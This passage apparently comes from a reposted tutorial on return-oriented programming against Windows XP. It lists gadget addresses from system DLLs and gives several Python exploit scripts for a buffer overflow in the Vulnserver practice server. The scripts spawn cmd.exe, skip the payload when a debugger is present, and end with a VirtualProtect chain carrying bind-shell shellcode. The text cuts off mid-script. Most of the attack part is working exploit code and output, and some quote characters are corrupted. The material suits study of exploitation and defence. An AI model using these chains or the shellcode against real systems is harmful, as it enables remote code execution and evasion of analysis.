EDX,DWORD PTR DS:[ECX] C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C828C2A MOV EDX,DWORD PTR DS:[EAX] C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C828CC3 MOV ESI,DWORD PTR DS:[EBX] C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C828D26 MOV EDX,DWORD PTR DS:[ECX] C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C828D4C MOV EDX,DWORD PTR DS:[EAX] C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C828D70 MOV EDX,DWORD PTR DS:[ECX] C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C828DAB MOV EAX,DWORD PTR DS:[EAX] C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C828DB1 MOV EDX,DWORD PTR DS:[ECX] C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C828E77 MOV EAX,DWORD PTR DS:[ESI] C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C8290AC MOV EAX,DWORD PTR DS:[ECX] C:\WINDOWS\system32\kernel32.dll [/I][/FONT] Memory to Register To transfer values from the stack to a register, we have gadgets like pop eax; ret ;pop ebx;ret This gadget pops a value from the stack and stores it in a processor register. We also have gadgets like: [FONT=Courier New][I]7C801118 MOV DWORD PTR DS:[ESI],EAX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C80168A MOV DWORD PTR DS:[EAX],ECX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C8016D9 MOV DWORD PTR DS:[EAX],ECX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C801728 MOV DWORD PTR DS:[EAX],EBX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C801761 MOV DWORD PTR DS:[ECX],EDX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C8017A2 MOV DWORD PTR DS:[EAX],ECX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C801800 MOV DWORD PTR DS:[ECX],EDX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C801823 MOV DWORD PTR DS:[ECX],EBX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C80188E MOV DWORD PTR DS:[ECX],EAX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C8018E2 MOV DWORD PTR DS:[EAX],EBX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C801957 MOV DWORD PTR DS:[EDX],ECX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C801963 MOV DWORD PTR DS:[ESI],EBX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C8019CC MOV DWORD PTR DS:[EAX],ECX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C8019F7 MOV DWORD PTR DS:[EAX],EBX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C801F22 MOV DWORD PTR DS:[EDX],EAX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C801F30 MOV DWORD PTR DS:[EAX],ECX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C802040 MOV DWORD PTR DS:[EAX],EDI C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C8021FC MOV DWORD PTR DS:[ECX],EDX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C8022D8 MOV DWORD PTR DS:[EAX],ECX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C80231F MOV DWORD PTR DS:[ECX],EDX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C80248B MOV DWORD PTR DS:[ECX],EAX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C802497 MOV DWORD PTR DS:[ECX],EAX C:\WINDOWS\system32\kernel32.dll [/I][/FONT] The gadget at 0x7C802497 kernel32.dll [I]MOV DWORD PTR DS:[ECX],EAX; ret, [/I]moves the value of EAX to a memory location pointed by ECX. [B]ROP Gadgets (arithmetic operations) [/B] The x86 primitive instructions related to arithmetic are ADD, SUB, MUL, DIV XOR, rotates and shifts etc., and we can search gadgets related to those operations. [B]Addition: [/B] [FONT=Courier New][I]7C95CE86 ADD ECX,EBP C:\WINDOWS\system32\ntdll.dll [/I][/FONT] [FONT=Courier New][I]7C96CCC0 ADD ECX,EBP C:\WINDOWS\system32\ntdll.dll [/I][/FONT] [FONT=Courier New][I]7C9761FB ADD ECX,ECX C:\WINDOWS\system32\ntdll.dll [/I][/FONT] [FONT=Courier New][I]7C9770F0 ADD EAX,EBP C:\WINDOWS\system32\ntdll.dll [/I][/FONT] [FONT=Courier New][I]7CA29036 ADD ESI,ESI C:\WINDOWS\system32\SHELL32.dll [/I][/FONT] [FONT=Courier New][I]7CA367A6 ADD EAX,EBP C:\WINDOWS\system32\SHELL32.dll [/I][/FONT] [FONT=Courier New][I]7CABF312 ADD EDI,EDI C:\WINDOWS\system32\SHELL32.dll [/I][/FONT] [FONT=Courier New][I]7CAE0091 ADD EAX,EBP C:\WINDOWS\system32\SHELL32.dll [/I][/FONT] [FONT=Courier New][I]7CB8C82F ADD EBX,EBP C:\WINDOWS\system32\SHELL32.dll [/I][/FONT] [FONT=Courier New][I]7CB9196F ADD EAX,EBP C:\WINDOWS\system32\SHELL32.dll [/I][/FONT] [FONT=Courier New][I]7CB9B4EA ADD EBX,EAX C:\WINDOWS\system32\SHELL32.dll [/I][/FONT] [FONT=Courier New][I]7CBA519A ADD EBX,EAX C:\WINDOWS\system32\SHELL32.dll [/I][/FONT] Similarly, we have subtraction, multiplication and division. E.g.: [FONT=Courier New][I]7C902AF5 SUB EAX,ECX C:\WINDOWS\system32\ntdll.dll [/I][/FONT] [FONT=Courier New][I]7C902AFF SUB EAX,ECX C:\WINDOWS\system32\ntdll.dll [/I][/FONT] [FONT=Courier New][I]7C902B09 SUB EAX,ECX C:\WINDOWS\system32\ntdll.dll [/I][/FONT] [FONT=Courier New][I]7C902B13 SUB EAX,ECX C:\WINDOWS\system32\ntdll.dll [/I][/FONT] Handling NULL Bytes in a ROP payload A ROP payload contains addresses or parameters to a system function (in case we are faking the stack frame of particular function). There is a high probability that a certain parameter of a system function or an address of a ROP gadget might contain one or many NULL bytes and they might be categorised as bad chars in the vulnerable function, eg. in case of strcpy, it stops copying the buffer as soon as a NULL (0×00) byte is encountered. If we go on without taking the null byte handling into account, our ROP payload will be incorrectly copied. Now, let us consider an example here: You have a hypothetical system function as FunctionX which takes two arguments x and y, in which y has to be necessarily 0 or null in order to work. Void FunctionX(DWORD x, DWORD y) { if (y == NULL) { ….. ….. ….. }[img=https://rstcenter.com/secimg.php?url=http://resources.infosecinstitute.com/wp-content/uploads/100912_1629_ReturnOrien6.png] exit(-1); } The stack frame of FunctionX will become like this. As we can see on the stack frame, it’s necessary that we place a null word as the second parameter to FunctionX, so how do we handle null bytes? There is a well known mathematical axiom: Let there be two variables A and B, we know A XOR B = z(say) now A XOR Z = B also B XOR Z = A let A = 0×00000000 let B = 0xffffffff; A XOR B = 0xffffffff (z) Now if we want to convert it back into A, we XOR it back with B(mask) Z XOR B = 0×00000000 We will use the XOR gadget combined with Load and Store gadgets to store the value back on the stack. To demonstrate this technique, we will exploit a buffer overflow in Vulnserver (see The Grey Corner: Introducing Vulnserver by Stephen Bradshaw). There exists a buffer overflow in the server when processing TRUN messages from the client. From vulnserver.c: [FONT=Courier New]else if (strncmp(RecvBuf, “TRUN “, 5) == 0) { [/FONT] [FONT=Courier New] char *TrunBuf = malloc(3000); [/FONT] [FONT=Courier New] memset(TrunBuf, 0, 3000); [/FONT] [FONT=Courier New] for (i = 5; i < RecvBufLen; i++) { [/FONT] [FONT=Courier New] if ((char)RecvBuf[i] == ‘.’) { [/FONT] [FONT=Courier New] strncpy(TrunBuf, RecvBuf, 3000); [/FONT] [FONT=Courier New] Function3(TrunBuf); [/FONT] [FONT=Courier New] break; [/FONT] [FONT=Courier New] } [/FONT] [FONT=Courier New] } [/FONT] The server accepts 3000 bytes after the TRUN message and passes it to Function3, where the buffer overflow takes place. [FONT=Courier New]void Function3(char *Input) { [/FONT] [FONT=Courier New] char Buffer2S[2000]; [/FONT] [FONT=Courier New] strcpy(Buffer2S, Input); [/FONT] [FONT=Courier New]} [/FONT] Using pattern_create.rb and pattern_offset.rb from Metasploit, we are able to determine that after 2006 bytes the EIP overwrite takes place. We will try to demonstrate a ROP payload executing WinExec to execute CMD.EXE using exploit code written in Python. [FONT=Courier New]# WinExec ROP exploit for vulnserver [/FONT] [FONT=Courier New]# (C) 2012 Rashid bhatt [/FONT] [FONT=Courier New]import socket, sys [/FONT] [FONT=Courier New]from struct import pack [/FONT] [FONT=Courier New]target = “127.0.0.1? [/FONT] [FONT=Courier New]port = int(“9999?) [/FONT] [FONT=Courier New]from operator import * [/FONT] [FONT=Courier New]param1 = xor(0x00B6FA60, 0xffffffff) # location of stack parameter [/FONT] [FONT=Courier New]lpCMDline = xor(0x00B6FA68, 0xffffffff) # pointer to string [/FONT] [FONT=Courier New]param2 = xor(0x00B6FA64, 0xffffffff) # location of stack parameter [/FONT] [FONT=Courier New]eip = pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, param1) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77C14001) # xchg eax, ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, lpCMDline) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C951376) # MOV DWORD PTR DS:[EAX],ECX [/FONT] [FONT=Courier New]## for nCMDShow , we have to make it zero [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, param2) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77C14001) # xchg eax, ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C91C91D) #xor ecx, ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C951376) # MOV DWORD PTR DS:[EAX],ECX [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C86114D) # call WinExec [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77C39E7E ) # ret to msvcrt_Exit ( function chained ) [/FONT] [FONT=Courier New]eip += pack(‘<L’,0xdeadbeef) # first param point to stack ( contains a null byte) [/FONT] [FONT=Courier New]eip += pack(‘<L’,0xdeadbeef ) # second param (zero nCMDShow = 0) [/FONT] [FONT=Courier New]eip += “cmd.exe” [/FONT] [FONT=Courier New]s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) [/FONT] [FONT=Courier New]s.connect((target,port)) [/FONT] [FONT=Courier New]s.send(“TRUN .” + “a” * 2006 + eip) [/FONT] [FONT=Courier New]s.recv(1000) [/FONT] [FONT=Courier New]s.close() [/FONT] UN-conditional and Conditional jumps in ROP attacks In ROP, the ESP keeps track of the next gadget to be executed, therefore by modifying the ESP we can divert or skip the execution of certain gadgets. The following diagram illustrates an infinite loop. [FONT=Courier New]# Infinite loop ROP payload [/FONT] [FONT=Courier New]# (C) 2012 Rashid Bhatt [/FONT] [FONT=Courier New]import socket, sys [/FONT] [FONT=Courier New]from struct import pack [/FONT] [FONT=Courier New]target = “127.0.0.1? [/FONT] [FONT=Courier New]port = int(“9999?) [/FONT] [FONT=Courier New]from operator import * [/FONT] [FONT=Courier New]esp_loc = xor(0x00B6FA3C, 0xffffffff) # location of DWORD after pop esp gadget on stack [/FONT] [FONT=Courier New]esp_val = xor(0x00B6FA38, 0xffffffff) # esp value [/FONT] [FONT=Courier New]eip = pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, esp_loc) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77C14001) # xchg eax, ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, esp_val) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C951376) # MOV DWORD PTR DS:[EAX],ECX [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C929BAB) # pop esp [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xdeadbeef) [/FONT] [FONT=Courier New]s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) [/FONT] [FONT=Courier New]s.connect((target,port)) [/FONT] [FONT=Courier New]s.send(“TRUN .” + “a” * 2006 + eip) [/FONT] [FONT=Courier New]s.recv(1000) [/FONT] [FONT=Courier New]s.close() [/FONT] Conditional jumps in ROP are quite tricky. We have to modify the ESP based on a certain comparison eg < ,> ,== . Comparing with zero We will check if the value is zero or not, and based on the comparison, we will add an offset to the ESP to skip certain gadgets. We need to store two values on the stack: 1: The value to be compared with zero. 2: ESP_DELTA , the value which will be added to the ESP if the condition is satisfied. The process takes place in the following steps:1: Load the value to be checked in a general purpose register and apply NEG x86 instruction on it. 2: NEG instruction Computes the 2? complement, and sets the CF as per the operand. 3: If the number is zero, the CF becomes zero, otherwise one. 4: Zero any register by xor reg,reg gadget, and use ADC reg,reg to place the CF in it. 5: Again use NEG instruction to compute the 2?s complement on the same register. The register would now either contain a single 1 bit or all zeros, based on the CF from the previous operation. 6: 2?s complement will transform it to all zeros if CF was 0 or all 1 if CF was 1. 7: Perform Logical AND of ESP_DELTA and the result. 8: Now, based on the CF we will either get ESP_DELTA or zero. 8: Add the result to the ESP. To demonstrate this technique, we will use the IsDebuggerPresent(void) function to check if the process is being debugged or not, and if not, we will proceed to execute CMD.exe using the earlier ROP payload: [FONT=Courier New]# Conditional ROP payload [/FONT] [FONT=Courier New]# (c) 2012 Rashid Bhatt [/FONT] [FONT=Courier New]import socket, sys [/FONT] [FONT=Courier New]from struct import pack [/FONT] [FONT=Courier New]target = “127.0.0.1? [/FONT] [FONT=Courier New]port = int(“9999?) [/FONT] [FONT=Courier New]from operator import * [/FONT] [FONT=Courier New]esp_delta_loc = xor(0x00B6FA88 , 0xffffffff) # location of esp_delta on stack [/FONT] [FONT=Courier New]esp_delta_value = xor(0×200, 0xffffffff) # value to be added to stack [/FONT] [FONT=Courier New]param1 = xor(0x00B6FA98, 0xffffffff) [/FONT] [FONT=Courier New]param1_val = xor(0×00, 0xffffffff) [/FONT] [FONT=Courier New]# handling zero bytes for ESP_DELTA [/FONT] [FONT=Courier New]eip = pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, esp_delta_loc) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77C14001) # xchg eax, ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, esp_delta_value) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C951376) # MOV DWORD PTR DS:[EAX],ECX [/FONT] [FONT=Courier New]# FOR POP EBX ; EBX = 0 ( unfortunately no gadget was available for xor ebx,ebx) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, param1) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77C14001) # xchg eax, ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, param1_val) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C951376) # MOV DWORD PTR DS:[EAX],ECX [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C812E03) # isdebuggerpresent() [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77E2233D) #xor esi,esi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77D74960) # NEG eax [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71A77D0B) # adc esi,esi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77C39F8F) # mov eax,esi (with side effects of popping a value from stack) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xdeadbeef) # junk [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77D74960) #neg eax [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C90ECEA) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xbadb00b) # ESP_DELTA fixed earlier [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77C13FFD) # XCHG EAX, ECX [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77C14518 ) # AND EDI,ECX [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C9742C9 ) # pop ebx [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xbadb00b) # ZERO fixed earlier [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77E0C1EE) # xchg eax, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C939D54) # ADD EBX,EAX [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C939C04) # ADD ESP, EBX [/FONT] [FONT=Courier New]# ============================== # [/FONT] [FONT=Courier New]param1 = xor(0x00B6FB00, 0xffffffff) # location of stack parameter [/FONT] [FONT=Courier New]lpCMDline = xor(0x00B6FB08, 0xffffffff) # pointer to string [/FONT] [FONT=Courier New]param2 = xor(0x00B6FB04, 0xffffffff) # location of stack parameter [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, param1) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77C14001) # xchg eax, ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, lpCMDline) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C951376) # MOV DWORD PTR DS:[EAX],ECX [/FONT] [FONT=Courier New]## for nCMDShow , we have to make it zero [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, param2) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77C14001) # xchg eax, ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C91C91D) #xor ecx, ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C951376) # MOV DWORD PTR DS:[EAX],ECX [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C86114D) # call WinExec [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77C39E7E ) # ret to msvcrt_Exit ( function chained ) [/FONT] [FONT=Courier New]eip += pack(‘<L’,0xdeadbeef) # first param point to stack ( contains a null byte) [/FONT] [FONT=Courier New]eip += pack(‘<L’,0xdeadbeef ) # second param (zero nCMDShow = 0) [/FONT] [FONT=Courier New]eip += “cmd.exe” [/FONT] [FONT=Courier New]# ========================================= # [/FONT] [FONT=Courier New]s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) [/FONT] [FONT=Courier New]s.connect((target,port)) [/FONT] [FONT=Courier New]s.send(“TRUN .” + “a” * 2006 + eip) [/FONT] [FONT=Courier New]s.recv(1000) [/FONT] [FONT=Courier New]s.close() [/FONT] Now, if we run the exploit without debugging the process, we will proceed to the execution of CMD.exe, but if the server is being debugged, the process will crash because that time the ROP payload for CMD.EXE will be skipped. We can verify this by debugging the server and then setting a break point at 7C939C04 ADD ESP, EBX gadget.Hit the Breakpoint at 7C939C04: [FONT=Courier New]7C939C04 01DC ADD ESP,EBX ; offset being added to esp [/FONT] [FONT=Courier New]7C939C06 05 9CEE977C ADD EAX,ntdll.7C97EE9C [/FONT] [FONT=Courier New]7C939C0B C3 RETN [/FONT] [FONT=Courier New]EAX FFFFFFFF [/FONT] [FONT=Courier New]ECX FFFFFFFF [/FONT] [FONT=Courier New]EDX 00657865 [/FONT] [FONT=Courier New]EBX 00000200 << 200 (hex) offset added when process in being debugged [/FONT] [FONT=Courier New]ESP 00B6FAA8 [/FONT] [FONT=Courier New]EBP 61616161 [/FONT] [FONT=Courier New]ESI DEADBEEF [/FONT] [FONT=Courier New]EDI 00000000 [/FONT] [FONT=Courier New]EIP 7C939C04 ntdll.7C939C04 [/FONT] Comparing two values A similar strategy is used to check if two values are equal to, less than, or greater than each other. A SUB instruction will subtract two values to be checked for equality; the SUB instruction sets the CF if the destination operand is greater. The CF would get updated if the values are not same, and then later apply the same logic of checking for zero. Putting it all Together We will now write a ROP exploit for Vulnserver to bind it to port 4444 TCP. To achieve that we will remark the stack memory with an executable permission using VirtualProtect Function and then we will jump to our shellcode located on the stack. [FONT=Courier New]# (c) 2012 Rashid Bhatt [/FONT] [FONT=Courier New]import socket, sys [/FONT] [FONT=Courier New]from struct import pack [/FONT] [FONT=Courier New]# tcp/ip bind 444 shellcode [/FONT] [FONT=Courier New]buf = “\x2b\xc9\x83\xe9\xb5\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x25\xab\x3a\xc9\x83\xee\xfc\xe2\xf4\xd9\x43\xb3\xc9\x25\xab\x5a\x40\xc0\x9a\xe8\xad\xae\xf9\x0a\x42\x77\xa7\xb1\x9b\x31\x20\x48\xe1\x2a\x1c\x70\xef\x14\x54\x0b\x09\x89\x97\x5b\xb5\x27\x87\x1a\x08\xea\xa6\x3b\x0e\xc7\x5b\x68\x9e\xae\xf9\x2a\x42\x67\x97\x3b\x19\xae\xeb\x42\x4c\xe5\xdf\x70\xc8\xf5\xfb\xb1\x81\x3d\x20\x62\xe9\x24\x78\xd9\xf5\x6c\x20\x0e\x42\x24\x7d\x0b\x36\x14\x6b\x96\x08\xea\xa6\x3b\x0e\x1d\x4b\x4f\x3d\x26\xd6\xc2\xf2\x58\x8f\x4f\x2b\x7d\x20\x62\xed\x24\x78\x5c\x42\x29\xe0\xb1\x91\x39\xaa\xe9\x42\x21\x20\x3b\x19\xac\xef\x1e\xed\x7e\xf0\x5b\x90\x7f\xfa\xc5\x29\x7d\xf4\x60\x42\x37\x40\xbc\x94\x4d\x98\x08\xc9\x25\xc3\x4d\xba\x17\xf4\x6e\xa1\x69\xdc\x1c\xce\xda\x7e\x82\x59\x24\xab\x3a\xe0\xe1\xff\x6a\xa1\x0c\x2b\x51\xc9\xda\x7e\x6a\x99\x75\xfb\x7a\x99\x65\xfb\x52\x23\x2a\x74\xda\x36\xf0\x3c\x0b\x12\x76\xc3\x38\xc9\x34\xf7\xb3\x2f\x4f\xbb\x6c\x9e\x4d\x69\xe1\xfe\x42\x54\xef\x9a\x72\xc3\x8d\x20\x1d\x54\xc5\x1c\x76\xf8\x6d\xa1\x51\x47\x01\x28\xda\x7e\x6d\x5e\x4d\xde\x54\x84\x44\x54\xef\xa3\x25\xc1\x3e\x9f\x72\xc3\x38\x10\xed\xf4\xc5\x1c\xae\x9d\x50\x89\x4d\xab\x2a\xc9\x25\xfd\x50\xc9\x4d\xf3\x9e\x9a\xc0\x54\xef\x5a\x76\xc1\x3a\x9f\x76\xfc\x52\xcb\xfc\x63\x65\x36\xf0\xaa\xf9\xe0\xe3\x2e\xcc\xbc\xc9\x68\x3a\xc9? [/FONT] [FONT=Courier New]target = “127.0.0.1? [/FONT] [FONT=Courier New]port = int(“9999?) [/FONT] [FONT=Courier New]from operator import * [/FONT] [FONT=Courier New]address_loc = xor(0x00B6FAD0 , 0xffffffff) [/FONT] [FONT=Courier New]address_val = xor(0x00B6FAE0, 0xffffffff) [/FONT] [FONT=Courier New]size_loc = xor(0x00B6FAD4, 0xffffffff) [/FONT] [FONT=Courier New]size = xor(len(buf), 0xffffffff) [/FONT] [FONT=Courier New]nprotect_loc = xor(0x00B6FAD8, 0xffffffff) [/FONT] [FONT=Courier New]nprotect = xor(0×40, 0xffffffff) [/FONT] [FONT=Courier New]oldprotect_loc = xor(0x00B6FADC, 0xffffffff) [/FONT] [FONT=Courier New]oldprotect = xor(0x00B6FAB4, 0xffffffff) [/FONT] [FONT=Courier New]# first param [/FONT] [FONT=Courier New]eip = pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, address_loc) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77C14001) # xchg eax, ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, address_val) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C951376) # MOV DWORD PTR DS:[EAX],ECX [/FONT] [FONT=Courier New]# second param [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, size_loc) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77C14001) # xchg eax, ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, size) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C951376) # MOV DWORD PTR DS:[EAX],ECX [/FONT] [FONT=Courier New]# Third param [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += 